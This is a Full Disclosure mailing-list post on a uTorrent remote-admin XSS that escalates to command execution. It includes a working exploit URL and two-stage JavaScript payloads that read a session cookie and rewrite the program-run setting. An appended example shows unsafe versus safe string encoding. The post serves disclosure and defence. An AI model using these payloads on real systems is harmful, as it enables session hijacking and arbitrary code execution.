Full Disclosure mailing list archives
Re: Transmission BitTorrent XSS Vulnerability
From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sat, 28 Jul 2012 19:36:39 +0200
Tavis Ormandy <taviso () cmpxchg8b com> wrote:
> Justin Klein Keane <justin () madirish net> wrote:
> > Impact
> > ------
> > Clients loading a maliciously crafted .torrent file into Transmission and viewing the web client could be subject to arbitrary script injection, allowing an attacker to run arbitrary code in the context of the victim's web browser. This could lead to privacy compromises (such as if the script "phoned home" to another URL with client information) or client side attacks (such as drive by downloads).
>
> I was just looking at a similar package for Windows called utorrent. They relay the remote administration through a third party, presumably to help non-technical users understand NAT traversal. Similar problems exist, but you can use it to set configuration options that result in command execution. I guess this problem is public as their contact address is a public bug tracking system (mea culpa). I have a working demo for command execution, email me off-list if you want it (I'm reluctant to send too much information about windows software to the list, as journalists tend to abuse it, email me if you need specifics).
>
> Tavis.
Too many requests, I've included details below. Don't get too excited, it's not very interesting. I suppose it's worth documenting as another example of XSS to native code execution, although it's more academic than a realistic threat as nobody is likely to use this with an expectation of security.

The problem is that any XSS on remote.utorrent.com (or presumably if you're a mitm with sslstrip) is equivalent to code execution if the "remote" option has been enabled in the preferences dialog (assuming the user is logged in, of course). As with any non-trivial web application, these are not difficult to find, even for non-web specialists like me. Once you have an XSS, exploitation is relatively straightforward.

- Read the bt_talon_tkt cookie from remote.utorrent.com
- Resolve the ticket to a raptor using XHR to 'https://remote.utorrent.com/talon/getinfo?bt_talon_tkt=' + encodeURIComponent(ticket);
- Exploit the same XSS on the raptor, allowing you to interact with the application.

The most obvious attack is to set the "state_cmd" option to whatever command you require (I assume \\remotehost\whatever.exe will work via the webdav redirector, but I didn't test it).
Here is the demo I sent to the vendor, I don't know if it works for all cases:

https://remote.utorrent.com/send?btih=DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF&dn=ignored&message=';eval(unescape(document.location.hash.substring(1)));//#

Wait a few seconds, then check the preferences pane of the client to see if the new setting has been set. The escaped text is the following inelegant code:

Stage 1 payload:

var ticket;
document.cookie.split(';').forEach(function (cookie) {
    ticket = cookie.indexOf('bt_talon_tkt') != -1 ? encodeURIComponent(cookie.split(unescape('%22'))[1]) : ticket
});
x = new XMLHttpRequest();
x.open('GET', '/talon/getinfo?bt_talon_tkt=' + ticket, false);
x.send();
raptor = eval('(' + x.responseText + ')').raptor;
document.location = raptor.replace('http:','https:').replace('9090','9000') + unescape('/send%3Fbtih%3DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%26dn%3Dignored%26message%3D%27%3Beval%28unescape%28document.location.hash.substring%281%29%29%29%3B//%23f%253Ddocument.createElement%2528%2527IFRAME%2527%2529%253Bf.src%253D%2527/talon/gui%253Futorrent%253D1%2527%253Bdocument.body.appendChild%2528f%2529%253BsetTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.uki%2528%2527%2523toolbar_preferences%2527%2529.trigger%2528%2527mousedown%2527%252C%2520%257Bwhich%2520%253A%25201%257D%2529%2520%257D%252C%25205000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.utWebUI.stpanes.show%2528%2527dlgSettings-RunProgram%2527%2529%2520%257D%252C%25206000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527state_cmd%2527%2529.value%253D%2527C%253A%255C%255CWINDOWS%255C%255CSYSTEM32%255C%255CCALC.EXE%2527%2520%257D%252C%25207000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527DLG_SETTINGS_SAVE%2527%2529.click%2528%2529%253B%2520%257D%252C%25208000%2529%253B');

Stage 2 payload:

f = document.createElement('IFRAME');
f.src = '/talon/gui?utorrent=1';
document.body.appendChild(f);
setTimeout(function () { f.contentDocument.window.uki('#toolbar_preferences').trigger('mousedown', {which : 1}) }, 5000);
setTimeout(function () { f.contentDocument.window.utWebUI.stpanes.show('dlgSettings-RunProgram') }, 6000);
setTimeout(function () { f.contentDocument.window.document.getElementById('state_cmd').value='C:\\WINDOWS\\SYSTEM32\\CALC.EXE' }, 7000);
setTimeout(function () { f.contentDocument.window.document.getElementById('DLG_SETTINGS_SAVE').click(); }, 8000);

I'm sure javascript programmers will cringe at my code, my apologies.

Tavis.

--
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
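The injection point in the post is a query parameter ("message") reflected straight into a JavaScript string literal, which is why a value beginning with `';` breaks out of the literal. The following is an added example (not Tavis's code, nor anything from µTorrent or Transmission) showing that templating bug beside a safe encoding; both versions are checked by executing the generated script in a scratch function scope. The function names and the flag-setting test value are constructed for this example.

```javascript
// Vulnerable: the untrusted value is concatenated into a single-quoted JS
// string literal, so a value containing  ';  ends the literal early and
// everything after it is parsed as code.
function renderVulnerable(message) {
  return "var message = '" + message + "';";
}

// Safe: JSON.stringify yields a valid double-quoted JS string literal with
// quotes and backslashes escaped. The extra replacements close the two
// remaining gaps when the literal lands inside a <script> element: a
// literal "</script>" (the HTML parser ends the script there regardless of
// JS quoting) and U+2028/U+2029, which JSON permits raw but older JS
// engines treated as line terminators.
function renderSafe(message) {
  return "var message = " + JSON.stringify(message)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029") + ";";
}

// Execute a generated snippet the way a browser would and report both the
// value `message` ended up holding and whether injected code ran. `scope.hit`
// is the only side effect the constructed test payload can produce. The
// newline before `return` matters: a payload ending in // would otherwise
// comment out the return statement as well.
function run(script) {
  const scope = { hit: false };
  const fn = new Function("scope", script + "\nreturn message;");
  const message = fn(scope);
  return { message: message, injected: scope.hit };
}

// Constructed test value: closes the literal, runs a statement, comments out
// the rest, mirroring the shape of the "message" parameter in the report.
const PAYLOAD = "';scope.hit=true;//";

// run(renderVulnerable(PAYLOAD)) -> { message: '', injected: true }
// run(renderSafe(PAYLOAD))       -> { message: PAYLOAD, injected: false }
```

Fixing the encoding closes the XSS only; the second half of the chain, a web UI setting that runs an arbitrary program, is a separate design risk that output encoding does nothing about.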